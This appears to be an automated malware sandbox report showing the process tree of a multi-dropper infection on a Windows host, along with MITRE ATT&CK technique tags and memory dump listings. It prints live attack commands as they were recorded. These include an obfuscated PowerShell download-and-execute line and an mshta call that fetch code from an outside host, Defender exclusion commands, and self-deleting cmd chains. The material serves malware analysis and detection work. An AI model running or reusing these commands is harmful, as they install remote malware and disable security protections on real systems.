- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2316
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3864
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3956
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:1772
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2360
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3348
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3584
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3636
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3836
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3140
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3484
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:360
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3932
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:4108
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:4184
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:4260
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:4364
- C:\Users\Admin\Documents\guWmD5gHjZRUtxL0_ytfPMm8.exe
  "C:\Users\Admin\Documents\guWmD5gHjZRUtxL0_ytfPMm8.exe"
  2⤵
  - Executes dropped EXE
  PID:316
- C:\Users\Admin\Documents\pePjKdtgRUa91FYCzQo5PvPU.exe
  "C:\Users\Admin\Documents\pePjKdtgRUa91FYCzQo5PvPU.exe"
  2⤵
  - Executes dropped EXE
  PID:1320
- C:\Users\Admin\Documents\2DtSA092jQqFAeQJHjYewdI5.exe
  "C:\Users\Admin\Documents\2DtSA092jQqFAeQJHjYewdI5.exe"
  2⤵
  - Executes dropped EXE
  PID:1576
- - C:\Users\Admin\AppData\Local\Temp\df6e720d-d920-40e5-8659-2418b2ead773\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\df6e720d-d920-40e5-8659-2418b2ead773\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\df6e720d-d920-40e5-8659-2418b2ead773\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:3020
  - - C:\Users\Admin\AppData\Local\Temp\df6e720d-d920-40e5-8659-2418b2ead773\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\df6e720d-d920-40e5-8659-2418b2ead773\AdvancedRun.exe" /SpecialRun 4101d8 3020
      4⤵
      PID:2296
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\2DtSA092jQqFAeQJHjYewdI5.exe" -Force
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\2DtSA092jQqFAeQJHjYewdI5.exe" -Force
    3⤵
    PID:2208
- C:\Users\Admin\Documents\m6R2P9LOEn25mfpBVIZGGIdJ.exe
  "C:\Users\Admin\Documents\m6R2P9LOEn25mfpBVIZGGIdJ.exe"
  2⤵
  - Executes dropped EXE
  PID:876
- - C:\Users\Admin\Documents\m6R2P9LOEn25mfpBVIZGGIdJ.exe
    "C:\Users\Admin\Documents\m6R2P9LOEn25mfpBVIZGGIdJ.exe"
    3⤵
    PID:1296
- - C:\Users\Admin\Documents\m6R2P9LOEn25mfpBVIZGGIdJ.exe
    "C:\Users\Admin\Documents\m6R2P9LOEn25mfpBVIZGGIdJ.exe"
    3⤵
    PID:2628
- - C:\Users\Admin\Documents\m6R2P9LOEn25mfpBVIZGGIdJ.exe
    "C:\Users\Admin\Documents\m6R2P9LOEn25mfpBVIZGGIdJ.exe"
    3⤵
    PID:1392
- - C:\Users\Admin\Documents\m6R2P9LOEn25mfpBVIZGGIdJ.exe
    "C:\Users\Admin\Documents\m6R2P9LOEn25mfpBVIZGGIdJ.exe"
    3⤵
    PID:2740
- - C:\Users\Admin\Documents\m6R2P9LOEn25mfpBVIZGGIdJ.exe
    "C:\Users\Admin\Documents\m6R2P9LOEn25mfpBVIZGGIdJ.exe"
    3⤵
    PID:2760
- C:\Users\Admin\Documents\C1x9o7mNpSzD4E1OmpDO0QGF.exe
  "C:\Users\Admin\Documents\C1x9o7mNpSzD4E1OmpDO0QGF.exe"
  2⤵
  - Executes dropped EXE
  PID:1612
- C:\Users\Admin\Documents\6ve9HxB5TNvAupA2OnmdALMD.exe
  "C:\Users\Admin\Documents\6ve9HxB5TNvAupA2OnmdALMD.exe"
  2⤵
  - Executes dropped EXE
  PID:1348
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "6ve9HxB5TNvAupA2OnmdALMD.exe" /f & erase "C:\Users\Admin\Documents\6ve9HxB5TNvAupA2OnmdALMD.exe" & exit
    3⤵
    PID:2804
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "6ve9HxB5TNvAupA2OnmdALMD.exe" /f
      4⤵
      Kills process with taskkill
      PID:1864
- C:\Users\Admin\Documents\OTX6AMcaGzkewpXrPWZY01H2.exe
  "C:\Users\Admin\Documents\OTX6AMcaGzkewpXrPWZY01H2.exe"
  2⤵
  - Executes dropped EXE
  PID:656
- C:\Users\Admin\Documents\IA6nXySJpPF0J9uVr5kqHiBx.exe
  "C:\Users\Admin\Documents\IA6nXySJpPF0J9uVr5kqHiBx.exe"
  2⤵
  - Executes dropped EXE
  PID:740
- C:\Users\Admin\Documents\6D5yT4hF5fDeMrzuGIbzA5Au.exe
  "C:\Users\Admin\Documents\6D5yT4hF5fDeMrzuGIbzA5Au.exe"
  2⤵
  PID:2072
- C:\Users\Admin\Documents\oNNTE2EiPHj9X37aTQeog4ou.exe
  "C:\Users\Admin\Documents\oNNTE2EiPHj9X37aTQeog4ou.exe"
  2⤵
  PID:2052
- C:\Users\Admin\Documents\hOQl1gfsOkHB9smIvh1p3ifV.exe
  "C:\Users\Admin\Documents\hOQl1gfsOkHB9smIvh1p3ifV.exe"
  2⤵
  PID:1960
- C:\Users\Admin\Documents\Ww4Dkb8__rZXjAI4qy6B8eOz.exe
  "C:\Users\Admin\Documents\Ww4Dkb8__rZXjAI4qy6B8eOz.exe"
  2⤵
  PID:1648
- - C:\Program Files (x86)\Company\NewProduct\cutm3.exe
    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
    3⤵
    PID:2784
- - C:\Program Files (x86)\Company\NewProduct\inst1.exe
    "C:\Program Files (x86)\Company\NewProduct\inst1.exe"
    3⤵
    PID:2848
- - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    3⤵
    PID:2792
- C:\Users\Admin\Documents\pUWMfPtFajvfsE7hKFNBFHuE.exe
  "C:\Users\Admin\Documents\pUWMfPtFajvfsE7hKFNBFHuE.exe"
  2⤵
  PID:436
- C:\Users\Admin\Documents\KsSEWQAvCgDSkEZYQpY230UU.exe
  "C:\Users\Admin\Documents\KsSEWQAvCgDSkEZYQpY230UU.exe"
  2⤵
  PID:1800
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\KSSEWQ~1.DLL,s C:\Users\Admin\DOCUME~1\KSSEWQ~1.EXE
    3⤵
    PID:3028
- C:\Users\Admin\Documents\VYrw7CbENh2h4xVmqAc01f59.exe
  "C:\Users\Admin\Documents\VYrw7CbENh2h4xVmqAc01f59.exe"
  2⤵
  PID:868
- C:\Users\Admin\Documents\w9A5WnhzeSRUrXrheT8zuXGp.exe
  "C:\Users\Admin\Documents\w9A5WnhzeSRUrXrheT8zuXGp.exe"
  2⤵
  PID:1616
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\Documents\w9A5WnhzeSRUrXrheT8zuXGp.exe"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF """" == """" for %Q in ( ""C:\Users\Admin\Documents\w9A5WnhzeSRUrXrheT8zuXGp.exe"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )
    3⤵
    PID:2500
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\Documents\w9A5WnhzeSRUrXrheT8zuXGp.exe" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "" == "" for %Q in ("C:\Users\Admin\Documents\w9A5WnhzeSRUrXrheT8zuXGp.exe" ) do taskkill -F -im "%~NxQ"
      4⤵
      PID:300
    - - C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE
        
        BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1
        5⤵
        
        PID:2528
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF ""-PyTJSIPDC12bsxp0f1 "" == """" for %Q in ( ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )
        6⤵
        
        PID:2556
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "-PyTJSIPDC12bsxp0f1 " == "" for %Q in ("C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" ) do taskkill -F -im "%~NxQ"
        7⤵
        
        PID:788
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" .\BPJm7xC.Iwa,Rgac
        6⤵
        
        PID:2864
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F -im "w9A5WnhzeSRUrXrheT8zuXGp.exe"
        5⤵
        Kills process with taskkill
        
        PID:1236
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" .\BPJm7xC.Iwa,Rgac
    3⤵
    PID:1136
- C:\Users\Admin\Documents\UKCm7CTzUAibVFZTV7f2y9ru.exe
  "C:\Users\Admin\Documents\UKCm7CTzUAibVFZTV7f2y9ru.exe"
  2⤵
  PID:1704
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1704 -s 1352
    3⤵
    - Program crash
    PID:644
- C:\Users\Admin\Documents\TZbqsVpnmnuSE0Ga96EXRkhV.exe
  "C:\Users\Admin\Documents\TZbqsVpnmnuSE0Ga96EXRkhV.exe"
  2⤵
  PID:1832
- - C:\Users\Admin\AppData\Local\Temp\egYyUoaC.com
    "C:\Users\Admin\AppData\Local\Temp\egYyUoaC.com"
    3⤵
    PID:2036
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3CF1.tmp\3D01.tmp\3D02.bat C:\Users\Admin\AppData\Local\Temp\egYyUoaC.com"
      4⤵
      PID:2140
- - C:\Users\Admin\AppData\Local\Temp\gyCLSMGX.com
    "C:\Users\Admin\AppData\Local\Temp\gyCLSMGX.com"
    3⤵
    PID:1804
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt
      4⤵
      PID:756
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ra/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
        5⤵
        
        PID:2524
- - C:\Users\Admin\AppData\Local\Temp\eGqESbA9.com
    "C:\Users\Admin\AppData\Local\Temp\eGqESbA9.com"
    3⤵
    PID:3000
- C:\Users\Admin\Documents\tyF716Bl2hZMkMgCCJY3Y1OJ.exe
  "C:\Users\Admin\Documents\tyF716Bl2hZMkMgCCJY3Y1OJ.exe"
  2⤵
  PID:812
- C:\Users\Admin\Documents\CL5hDGOwNisXthMR6o5dE8u2.exe
  "C:\Users\Admin\Documents\CL5hDGOwNisXthMR6o5dE8u2.exe"
  2⤵
  PID:1812
- C:\Users\Admin\Documents\5vaXzVvK2vBPibSApvEICKjI.exe
  "C:\Users\Admin\Documents\5vaXzVvK2vBPibSApvEICKjI.exe"
  2⤵
  PID:952
- C:\Users\Admin\Documents\uNstEPV8Qc9VrmoUVGsUS0TQ.exe
  "C:\Users\Admin\Documents\uNstEPV8Qc9VrmoUVGsUS0TQ.exe"
  2⤵
  PID:1384
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "uNstEPV8Qc9VrmoUVGsUS0TQ.exe" /f & erase "C:\Users\Admin\Documents\uNstEPV8Qc9VrmoUVGsUS0TQ.exe" & exit
    3⤵
    PID:1500

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "uNstEPV8Qc9VrmoUVGsUS0TQ.exe" /f
1⤵
- Kills process with taskkill
PID:2808

C:\Users\Admin\AppData\Local\Temp\4911.exe
C:\Users\Admin\AppData\Local\Temp\4911.exe
1⤵
PID:3136
- C:\Users\Admin\AppData\Local\Temp\4911.exe
  C:\Users\Admin\AppData\Local\Temp\4911.exe
  2⤵
  PID:4892

C:\Users\Admin\AppData\Local\Temp\81CE.exe
C:\Users\Admin\AppData\Local\Temp\81CE.exe
1⤵
PID:3676

C:\Users\Admin\AppData\Local\Temp\F6A0.exe
C:\Users\Admin\AppData\Local\Temp\F6A0.exe
1⤵
PID:4236

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/316-166-0x0000000000A30000-0x0000000000A31000-memory.dmp

Filesize
4KB

Download
memory/436-198-0x0000000002DE0000-0x0000000002DFC000-memory.dmp

Filesize
112KB

Download
memory/740-157-0x00000000003F0000-0x00000000003F1000-memory.dmp

Filesize
4KB

Download
memory/740-163-0x000000001B070000-0x000000001B072000-memory.dmp

Filesize
8KB

Download
memory/740-164-0x0000000000140000-0x0000000000159000-memory.dmp

Filesize
100KB

Download
memory/812-189-0x00000000001C0000-0x00000000001C1000-memory.dmp

Filesize
4KB

Download
memory/868-165-0x0000000001320000-0x0000000001321000-memory.dmp

Filesize
4KB

Download
memory/876-160-0x0000000000370000-0x0000000000371000-memory.dmp

Filesize
4KB

Download
memory/876-211-0x0000000001E60000-0x0000000001E7E000-memory.dmp

Filesize
120KB

Download
memory/952-185-0x0000000000880000-0x0000000000881000-memory.dmp

Filesize
4KB

Download
memory/1092-159-0x00000000013A0000-0x00000000013A1000-memory.dmp

Filesize
4KB

Download
memory/1320-173-0x0000000000F80000-0x0000000000F81000-memory.dmp

Filesize
4KB

Download
memory/1576-167-0x0000000000D70000-0x0000000000D71000-memory.dmp

Filesize
4KB

Download
memory/1576-207-0x0000000004A00000-0x0000000004A72000-memory.dmp

Filesize
456KB

Download
memory/1692-109-0x0000000000020000-0x000000000002A000-memory.dmp

Filesize
40KB

Download
memory/1816-61-0x0000000003E50000-0x0000000003F8F000-memory.dmp

Filesize
1.2MB

Download
memory/1816-60-0x0000000075631000-0x0000000075633000-memory.dmp

Filesize
8KB

Download
memory/1832-214-0x000007FEFB881000-0x000007FEFB883000-memory.dmp

Filesize
8KB

Download
memory/2052-182-0x0000000000CC0000-0x0000000000CC1000-memory.dmp

Filesize
4KB

Download
memory/2284-168-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3040-201-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/3040-199-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads